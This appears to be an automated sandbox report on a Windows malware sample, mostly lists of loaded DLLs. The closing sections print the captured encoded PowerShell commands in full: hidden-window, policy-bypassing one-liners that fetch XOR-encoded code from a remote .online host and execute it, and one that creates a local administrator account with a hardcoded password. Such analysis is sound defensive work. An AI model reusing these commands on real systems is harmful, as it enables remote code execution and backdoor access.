Source: C:\Windows\Temp\svczHost.exe	Section loaded: icu.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: mswsock.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: wshunix.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: winrnr.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: nlaapi.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: wshbth.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: devobj.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: apphelp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: version.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: edgegdi.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: icu.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: amsi.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: userenv.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: profapi.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: winhttp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: mswsock.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: wshunix.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: winrnr.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: nlaapi.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: wshbth.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: devobj.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: napinsp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: winsta.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: sspicli.dll
Source: C:\Windows\regedit.exe	Section loaded: authz.dll
Source: C:\Windows\regedit.exe	Section loaded: aclui.dll
Source: C:\Windows\regedit.exe	Section loaded: ulib.dll
Source: C:\Windows\regedit.exe	Section loaded: clb.dll
Source: C:\Windows\regedit.exe	Section loaded: uxtheme.dll
Source: C:\Windows\regedit.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\regedit.exe	Section loaded: xmllite.dll
Source: C:\Windows\regedit.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll

Source: C:\Windows\Temp\myRdpService.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\systeminfo.exe "C:\Windows\system32\systeminfo.exe"

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Directory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml

Source: ny.lnk.d.lnk

Static file information: File size 80740352 > 1048576

Source:

Binary string: corlib.pdbpdblib.pdbU source: powershell.exe, 00000005.00000002.24431081680.000001C3F800F000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String("QTlJQ1IyWVd4MVpUc05DaUFnSUNBa2RYSnBJRDBnSW1oMGRIQTZMeTloYTJGa1pXMXBhV2xwYVdscGFTNXZibXhwYm1Vdk0yTXhaV1EyTjJVMlltTmlPRGc1WWpKaVlXSTBaamc1T0RWaU1HRXpOelU1TldSalpEUmtaakkwT0RZMk56a3pZal
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String("Q2lBZ0lDQWtiRzluVFdWemMyRm5aWE1nS3owZ0pITjBjbWx1WjBKdlpIazdEUW9nSUNBZ0pHeHZaMDFsYzNOaFoyVnpJQ3M5SUNJdExTMHRMUzB0TFMwdElqc05DZzBLSUNBZ0lDUm9aV0ZrWlhKeklEMGdRSHQ5T3cwS0lDQWdJQ1JyWlhrZ1

PowerShell case anomaly found

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "STaRT /MiN "" POwerShElL -WIndowStYLe HIddEn -EnCoDeDCOMmand "SQBFAFgAIAAoAFsAVABFAHgAdAAuAEUAbgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIASQBOAEcAKAAoAEkAVwByACAAIgBoAHQAdABwAHMAOgAvAC8AYQBrAGEAZABlAG0AaQBpAGkAaQBpAGkAaQBpAC4AbwBuAGwAaQBuAGUALwB0AC8ANgBkAGUAZgA2ADcAYgBkADUAOAAzADEAOABhADUAOQAzADgAMwBiAGIAMAA2ADkAMwA5ADUAYgA0ADkANwBiADEAMwBiADEAZQBlADMAYgBjADMAOQAzAGIAOABjAGYAOAAzADYANQA2AGMANABjAGQANwBkADIAMwAzADUAMQAiACkALgBDAE8AbgB0AEUAbgB0AC4ARgBPAFIARQBhAGMASAAoAHsAJABfACAALQBCAFgAbwBSACAAMQB9ACkAKQApAA=="" && exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerShElL -WIndowStYLe HIddEn -EnCoDeDCOMmand "SQBFAFgAIAAoAFsAVABFAHgAdAAuAEUAbgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIASQBOAEcAKAAoAEkAVwByACAAIgBoAHQAdABwAHMAOgAvAC8AYQBrAGEAZABlAG0AaQBpAGkAaQBpAGkAaQBpAC4AbwBuAGwAaQBuAGUALwB0AC8ANgBkAGUAZgA2ADcAYgBkADUAOAAzADEAOABhADUAOQAzADgAMwBiAGIAMAA2ADkAMwA5ADUAYgA0ADkANwBiADEAMwBiADEAZQBlADMAYgBjADMAOQAzAGIAOABjAGYAOAAzADYANQA2AGMANABjAGQANwBkADIAMwAzADUAMQAiACkALgBDAE8AbgB0AEUAbgB0AC4ARgBPAFIARQBhAGMASAAoAHsAJABfACAALQBCAFgAbwBSACAAMQB9ACkAKQApAA=="
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerShElL -WIndowStYLe HIddEn -EnCoDeDCOMmand "SQBFAFgAIAAoAFsAVABFAHgAdAAuAEUAbgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIASQBOAEcAKAAoAEkAVwByACAAIgBoAHQAdABwAHMAOgAvAC8AYQBrAGEAZABlAG0AaQBpAGkAaQBpAGkAaQBpAC4AbwBuAGwAaQBuAGUALwB0AC8ANgBkAGUAZgA2ADcAYgBkADUAOAAzADEAOABhADUAOQAzADgAMwBiAGIAMAA2ADkAMwA5ADUAYgA0ADkANwBiADEAMwBiADEAZQBlADMAYgBjADMAOQAzAGIAOABjAGYAOAAzADYANQA2AGMANABjAGQANwBkADIAMwAzADUAMQAiACkALgBDAE8AbgB0AEUAbgB0AC4ARgBPAFIARQBhAGMASAAoAHsAJABfACAALQBCAFgAbwBSACAAMQB9ACkAKQApAA=="	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerShElL -WIndowStYLe HIddEn -EnCoDeDCOMmand "SQBFAFgAIAAoAFsAVABFAHgAdAAuAEUAbgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIASQBOAEcAKAAoAEkAVwByACAAIgBoAHQAdABwAHMAOgAvAC8AYQBrAGEAZABlAG0AaQBpAGkAaQBpAGkAaQBpAC4AbwBuAGwAaQBuAGUALwB0AC8ANgBkAGUAZgA2ADcAYgBkADUAOAAzADEAOABhADUAOQAzADgAMwBiAGIAMAA2ADkAMwA5ADUAYgA0ADkANwBiADEAMwBiADEAZQBlADMAYgBjADMAOQAzAGIAOABjAGYAOAAzADYANQA2AGMANABjAGQANwBkADIAMwAzADUAMQAiACkALgBDAE8AbgB0AEUAbgB0AC4ARgBPAFIARQBhAGMASAAoAHsAJABfACAALQBCAFgAbwBSACAAMQB9ACkAKQApAA=="
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoExit -WindowStyle Hidden -NoProfile -ExecutionPolicy bypass -EncodedCommand SQBFAFgAIAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEkAdwByACAAIgBoAHQAdABwADoALwAvAGEAawBhAGQAZQBtAGkAaQBpAGkAaQBpAGkAaQAuAG8AbgBsAGkAbgBlAC8AdAAvAGYAZgA4ADQANQA5ADQAOABlAGUAMgBjAGMAYgBkAGEAMwAzAGEAYQBhAGYAMQAzAGUAYwA4ADcAMwBhADYAMgAyADIANwBjADYAYwBmADQAMQBkAGMAMwBjAGYAYgA0AGQAZABhADAAMABiADcAMQBlADIAYQBlAGYANgA5ADUAMgBlADIAMwBjADUAOABlADUAYQAyADcAOQA3ADQAYgBiADIAMABlAGMAOAAwADIAMQAyADQAYgBlADkAOQBhACIAKQAuAEMAbwBuAHQAZQBuAHQALgBGAG8AcgBFAGEAYwBoACgAewAkAF8AIAAtAGIAeABvAHIAIAAxAH0AKQApACkA
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerShElL -WIndowStYLe HIddEn -EnCoDeDCOMmand "SQBFAFgAIAAoAFsAVABFAHgAdAAuAEUAbgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIASQBOAEcAKAAoAEkAVwByACAAIgBoAHQAdABwAHMAOgAvAC8AYQBrAGEAZABlAG0AaQBpAGkAaQBpAGkAaQBpAC4AbwBuAGwAaQBuAGUALwB0AC8ANgBkAGUAZgA2ADcAYgBkADUAOAAzADEAOABhADUAOQAzADgAMwBiAGIAMAA2ADkAMwA5ADUAYgA0ADkANwBiADEAMwBiADEAZQBlADMAYgBjADMAOQAzAGIAOABjAGYAOAAzADYANQA2AGMANABjAGQANwBkADIAMwAzADUAMQAiACkALgBDAE8AbgB0AEUAbgB0AC4ARgBPAFIARQBhAGMASAAoAHsAJABfACAALQBCAFgAbwBSACAAMQB9ACkAKQApAA=="	Jump to behavior
